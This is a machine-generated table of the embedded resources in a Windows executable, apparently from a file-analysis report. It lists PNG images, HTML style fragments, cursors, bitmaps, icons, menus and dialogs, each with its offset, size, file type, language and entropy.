                                                                                      PNG0x61bf3c0x228PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019927536231884
                                                                                      PNG0x61c1640x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                      PNG0x61c6ec0x38aPNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0121412803532008
                                                                                      PNG0x61ca780x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                      PNG0x61cfac0x32fPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0134969325153373
                                                                                      PNG0x61d2dc0xef8PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9950417536534447
                                                                                      PNG0x61e1d40x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                      PNG0x61e2500x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                      PNG0x61f6140x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                      PNG0x61f9940x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                      PNG0x61fd2c0x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                      PNG0x620f8c0x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                      PNG0x6223400x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                      PNG0x6226ac0x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                      PNG0x622a780x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                      PNG0x623d980x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                      PNG0x6251440x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                      PNG0x6254a80x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                      PNG0x6258640x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                      PNG0x626ad80x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                      PNG0x627e780x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                      PNG0x6281f80x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                      PNG0x62854c0x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                      PNG0x6297d40x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                      PNG0x62a1740x2e6PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148247978436657
                                                                                      PNG0x62a45c0x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                      PNG0x62b80c0x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                      PNG0x62bb740x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                      PNG0x62bee80x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                      PNG0x62d1540xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                      PNG0x62d2280x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                      PNG0x62e5bc0x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                      PNG0x62e9300x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                      PNG0x62ed240x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                      PNG0x6300280x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                      PNG0x6313c00x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                      PNG0x6317340x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                      PNG0x631a740x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                      PNG0x632c140xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                      PNG0x632cbc0x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                      PNG0x63365c0x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                      PNG0x6339540x17ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                      PNG0x633ad40x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                      PNG0x633b480x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                      PNG0x633c600x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                      PNG0x633cc80xd7PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232558139534884
                                                                                      PNG0x633da00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                      PNG0x6347e00x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                      PNG0x634a640x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                      PNG0x634af80x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                      PNG0x6354640x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                      PNG0x635e000x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                      PNG0x6360f80x1d3PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019271948608137
                                                                                      PNG0x6362cc0x1f8PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0138888888888888
                                                                                      PNG0x6364c40x67PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States0.9514563106796117
                                                                                      PNG0x63652c0x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x6365c40x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                      PNG0x6369640x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                      PNG0x636d040x1c1PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.024498886414254
                                                                                      PNG0x636ec80x153PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0324483775811208
                                                                                      PNG0x63701c0x15fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113960113960114
                                                                                      PNG0x63717c0x100PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03515625
                                                                                      PNG0x63727c0x108PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.018939393939394
                                                                                      PNG0x6373840xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010989010989011
                                                                                      PNG0x63743c0x151PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032640949554896
                                                                                      PNG0x6375900x135PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.029126213592233
                                                                                      PNG0x6376c80xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                      PNG0x63849c0x129PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0303030303030303
                                                                                      PNG0x6385c80x10bPNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0337078651685394
                                                                                      PNG0x6386d40x87PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0074074074074073
                                                                                      PNG0x63875c0x12fPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0264026402640265
                                                                                      PNG0x63888c0x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                      PNG0x638d1c0xd5cPNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003216374269006
                                                                                      PNG0x639a780x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                      PNG0x639e080x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                      PNG0x63a0700x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                      PNG0x63a19c0xcb5PNG image data, 10 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033814940055334
                                                                                      PNG0x63ae540xb8bPNG image data, 10 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037225042301186
                                                                                      PNG0x63b9e00xb50PNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037983425414365
                                                                                      PNG0x63c5300x2885PNG image data, 42 x 348, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010604453870626
                                                                                      PNG0x63edb80xd8ePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031700288184437
                                                                                      PNG0x63fb480x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                      PNG0x6400840x10a5PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025815536259095
                                                                                      PNG0x64112c0x1035PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002651241262955
                                                                                      PNG0x6421640xe81PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0029625639644493
                                                                                      PNG0x642fe80xedbPNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028924533263213
                                                                                      PNG0x643ec40xf2fPNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028299459737586
                                                                                      PNG0x644df40xeeePNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028780743066457
                                                                                      PNG0x645ce40xe64PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002985884907709
                                                                                      PNG0x646b480xf4bPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0028097062579822
                                                                                      PNG0x647a940xf36PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002824858757062
                                                                                      PNG0x6489cc0xe9bPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0029419630917358
                                                                                      PNG0x6498680xfa9PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027438263906212
                                                                                      PNG0x64a8140x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                      PNG0x64a9c80xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                      PNG0x64aab40x1936PNG image data, 56 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001704369383328
                                                                                      PNG0x64c3ec0xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                      PNG0x64cf300x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                      PNG0x64d53c0x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                      PNG0x64edec0x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                      PNG0x64ff640x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                      PNG0x6525500x1521PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00203364762433
                                                                                      PNG0x653a740xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                      PNG0x65463c0xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                      PNG0x65526c0x10aePNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002576112412178
                                                                                      PNG0x65631c0x105aPNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0026278069756331
                                                                                      PNG0x6573780x10cfPNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025563560306763
                                                                                      PNG0x6584480x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                      PNG0x6589d00xdc7PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031187978451943
                                                                                      PNG0x6597980xc59PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034799114204365
                                                                                      PNG0x65a3f40xecePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021108179419524
                                                                                      PNG0x65b2c40x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                      PNG0x65b3400xaf6PNG image data, 3 x 3, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00392017106201
                                                                                      PNG0x65be380xafdPNG image data, 3 x 3, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039104159260577
                                                                                      PNG0x65c9380x1570PNG image data, 18 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020043731778425
                                                                                      PNG0x65dea80x1623PNG image data, 18 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0019410622904534
                                                                                      PNG0x65f4cc0x18ePNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0276381909547738
                                                                                      PNG0x65f65c0x29fPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0163934426229508
                                                                                      PNG0x65f8fc0x18cPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0277777777777777
                                                                                      PNG0x65fa880x23aPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0192982456140351
                                                                                      PNG0x65fcc40x1e1PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.022869022869023
                                                                                      PNG0x65fea80x17dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0288713910761156
                                                                                      PNG0x6600280x16ePNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.030054644808743
                                                                                      PNG0x6601980x18aPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0279187817258884
                                                                                      PNG0x6603240x2adPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0160583941605839
                                                                                      STYLE_XML0x6605d40x4e01HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.1839851770243878
                                                                                      STYLE_XML0x6653d80x4b09HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20396689052006872
                                                                                      STYLE_XML0x669ee40x4aa6HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20460491889063318
                                                                                      STYLE_XML0x66e98c0x4a18HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20397511598481655
                                                                                      STYLE_XML0x6733a40x16adHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.1982773471145564
                                                                                      RT_CURSOR0x674a540x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                      RT_CURSOR0x674b880xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                      RT_CURSOR0x674c3c0x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                      RT_CURSOR0x674d700x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                      RT_CURSOR0x674ea40x134dataEnglishUnited States0.37337662337662336
                                                                                      RT_CURSOR0x674fd80x134dataEnglishUnited States0.37662337662337664
                                                                                      RT_CURSOR0x67510c0x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                      RT_CURSOR0x6752400x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                      RT_CURSOR0x6753740x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                      RT_CURSOR0x6754a80x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                      RT_CURSOR0x6755dc0x134dataEnglishUnited States0.44155844155844154
                                                                                      RT_CURSOR0x6757100x134dataEnglishUnited States0.4155844155844156
                                                                                      RT_CURSOR0x6758440x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                      RT_CURSOR0x6759780x134dataEnglishUnited States0.2662337662337662
                                                                                      RT_CURSOR0x675aac0x134dataEnglishUnited States0.2824675324675325
                                                                                      RT_CURSOR0x675be00x134dataEnglishUnited States0.3246753246753247
                                                                                      RT_CURSOR0x675d140x134dataEnglishUnited States0.20454545454545456
                                                                                      RT_CURSOR0x675e480x134dataEnglishUnited States0.2857142857142857
                                                                                      RT_CURSOR0x675f7c0x134dataEnglishUnited States0.4675324675324675
                                                                                      RT_CURSOR0x6760b00x134dataEnglishUnited States0.2532467532467532
                                                                                      RT_CURSOR0x6761e40x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.40584415584415584
                                                                                      RT_CURSOR0x6763180x134dataEnglishUnited States0.4383116883116883
                                                                                      RT_CURSOR0x67644c0x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                      RT_CURSOR0x6765800x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.39285714285714285
                                                                                      RT_CURSOR0x6766b40x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4512987012987013
                                                                                      RT_CURSOR0x6767e80x134dataEnglishUnited States0.37337662337662336
                                                                                      RT_CURSOR0x67691c0x134dataEnglishUnited States0.4448051948051948
                                                                                      RT_CURSOR0x676a500x134dataEnglishUnited States0.525974025974026
                                                                                      RT_BITMAP0x676b840x62cDevice independent bitmap graphic, 324 x 9 x 4, image size 1476EnglishUnited States0.2430379746835443
                                                                                      RT_BITMAP0x6771b00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.5818965517241379
                                                                                      RT_BITMAP0x6772980x4a0Device independent bitmap graphic, 144 x 15 x 4, image size 1080EnglishUnited States0.3783783783783784
                                                                                      RT_BITMAP0x6777380x197aDevice independent bitmap graphic, 144 x 15 x 24, image size 6482, resolution 2834 x 2834 px/mEnglishUnited States0.380098129408157
                                                                                      RT_BITMAP0x6790b40xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.51
                                                                                      RT_BITMAP0x67917c0xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.515
                                                                                      RT_BITMAP0x6792440xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.43
                                                                                      RT_BITMAP0x67930c0xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.44
                                                                                      RT_BITMAP0x6793d40x182aDevice independent bitmap graphic, 128 x 16 x 24, image size 6146, resolution 2834 x 2834 px/mEnglishUnited States0.2924345295829292
                                                                                      RT_BITMAP0x67ac000x468Device independent bitmap graphic, 128 x 16 x 4, image size 1024EnglishUnited States0.3058510638297872
                                                                                      RT_BITMAP0x67b0680x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4803030303030303
                                                                                      RT_BITMAP0x67b5900x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4765151515151515
                                                                                      RT_BITMAP0x67bab80x158Device independent bitmap graphic, 32 x 15 x 4, image size 240EnglishUnited States0.41569767441860467
                                                                                      RT_BITMAP0x67bc100x188Device independent bitmap graphic, 48 x 12 x 4, image size 288EnglishUnited States0.39285714285714285
                                                                                      RT_BITMAP0x67bd980x1e8Device independent bitmap graphic, 48 x 16 x 4, image size 384EnglishUnited States0.5081967213114754
                                                                                      RT_BITMAP0x67bf800xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.18736462093862816
                                                                                      RT_BITMAP0x67ca540xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.1844765342960289
                                                                                      RT_BITMAP0x67d5280xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.19497523000707714
                                                                                      RT_BITMAP0x67e0340x7e2Device independent bitmap graphic, 25 x 26 x 24, image size 1978, resolution 2834 x 2834 px/mEnglishUnited States0.24033696729435083
                                                                                      RT_BITMAP0x67e8180xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.1935598018400566
                                                                                      RT_BITMAP0x67f3240x134Device independent bitmap graphic, 17 x 17 x 4, image size 204EnglishUnited States0.37337662337662336
                                                                                      RT_BITMAP0x67f4580x92aDevice independent bitmap graphic, 48 x 16 x 24, image size 2306, resolution 2834 x 2834 px/mEnglishUnited States0.6577152600170503
                                                                                      RT_BITMAP0x67fd840x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.7518518518518519
                                                                                      RT_BITMAP0x6800b00x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.3790123456790123
                                                                                      RT_BITMAP0x6803dc0xc2aDevice independent bitmap graphic, 64 x 16 x 24, image size 3074, resolution 2834 x 2834 px/mEnglishUnited States0.42485549132947975
                                                                                      RT_BITMAP0x6810080x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.9367816091954023
                                                                                      RT_BITMAP0x6812140x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.4482758620689655
                                                                                      RT_BITMAP0x6814200x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.33524904214559387
                                                                                      RT_BITMAP0x68162c0x20aDevice independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/mEnglishUnited States0.3371647509578544
                                                                                      RT_BITMAP0x6818380x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.6320987654320988
                                                                                      RT_BITMAP0x681b640x2256Device independent bitmap graphic, 324 x 9 x 24, image size 8750, resolution 2834 x 2834 px/mEnglishUnited States0.0608646188850967
                                                                                      RT_BITMAP0x683dbc0x602aDevice independent bitmap graphic, 192 x 32 x 32, image size 24578, resolution 2834 x 2834 px/mEnglishUnited States0.2250385896498497
                                                                                      RT_BITMAP0x689de80x2028Device independent bitmap graphic, 128 x 16 x 32, image size 0EnglishUnited States0.24708454810495628
                                                                                      RT_BITMAP0x68be100x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.11570247933884298
                                                                                      RT_BITMAP0x68d1ec0x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.10999606454151908
                                                                                      RT_BITMAP0x68e5c80x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.11511216056670602
                                                                                      RT_BITMAP0x68f9a40xeb2Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/mEnglishUnited States0.13157894736842105
                                                                                      RT_BITMAP0x6908580x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.11983471074380166
                                                                                      RT_BITMAP0x691c340x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.27371113734750097
                                                                                      RT_BITMAP0x6930100x13daDevice independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.2699724517906336
                                                                                      RT_BITMAP0x6943ec0x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.2426210153482881
                                                                                      RT_BITMAP0x6957c80xeb2Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/mEnglishUnited States0.3413078149920255
                                                                                      RT_BITMAP0x69667c0x13daDevice independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/mEnglishUnited States0.23868555686737505
                                                                                      RT_BITMAP0x697a580x5a66Device independent bitmap graphic, 77 x 75 x 32, image size 23102, resolution 2834 x 2834 px/mEnglishUnited States0.046365914786967416
                                                                                      RT_BITMAP0x69d4c00xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                      RT_BITMAP0x69d5780x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                      RT_ICON0x69d6bc0x71ffPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9808107459822499
                                                                                      RT_ICON0x6a48bc0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.19843546669821366
                                                                                      RT_ICON0x6b50e40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.27414974019839394
                                                                                      RT_ICON0x6b930c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.3026970954356846
                                                                                      RT_ICON0x6bb8b40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.3442776735459662
                                                                                      RT_ICON0x6bc95c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5150709219858156
                                                                                      RT_ICON0x6bcdc40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.33198924731182794
                                                                                      RT_ICON0x6bd0ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.41216216216216217
                                                                                      RT_ICON0x6bd1d40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42905405405405406
                                                                                      RT_ICON0x6bd2fc0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.2661290322580645
                                                                                      RT_ICON0x6bd5e40x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.3581081081081081
                                                                                      RT_ICON0x6bd70c0x368Device independent bitmap graphic, 16 x 32 x 24, image size 0EnglishUnited States0.6272935779816514
                                                                                      RT_ICON0x6bda740x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5452127659574468
                                                                                      RT_ICON0x6bdedc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6400709219858156
                                                                                      RT_ICON0x6be3440x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5
                                                                                      RT_MENU0x6be46c0xd4dataEnglishUnited States0.6084905660377359
                                                                                      RT_MENU0x6be5400x11cdataEnglishUnited States0.573943661971831
                                                                                      RT_DIALOG0x6be65c0xa8dataEnglishUnited States0.75
                                                                                      RT_DIALOG0x6be7040x2a4dataEnglishUnited States0.46745562130177515
                                                                                      RT_DIALOG0x6be9a80x1bedataEnglishUnited States0.48654708520179374
                                                                                      RT_DIALOG0x6beb680x21adataEnglishUnited States0.45724907063197023
